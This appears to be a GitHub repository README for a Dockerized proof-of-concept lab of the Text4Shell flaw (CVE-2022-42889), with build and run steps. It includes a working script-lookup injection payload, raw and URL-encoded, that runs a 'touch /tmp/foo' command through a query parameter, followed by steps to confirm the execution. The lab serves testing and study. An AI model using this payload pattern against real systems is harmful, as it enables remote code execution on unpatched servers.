Skip to content

HuskyHacks/cve-2022-42889-text4shell-docker

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Install maven - maven-linux


  1. Maven install to create the fat jar
mvn clean install
  1. Docker build
docker build --tag=text4shell .
  1. Docker run
docker run -p 80:8080 text4shell
  1. Test the app
http://localhost/text4shell/attack?search=<anything>
  1. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. You can also try using dns or url prefixes.

  2. Get the container id

docker container ls
  1. Get into the app
docker exec -it <container_id> bash
  1. To check if above RCE was successful (You should see a file named foo created in the /tmp directory):
ls /tmp/
  1. To stop the container
docker container stop <container_id>

About

Dockerized POC for CVE-2022-42889 Text4Shell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 74.0%
  • Dockerfile 26.0%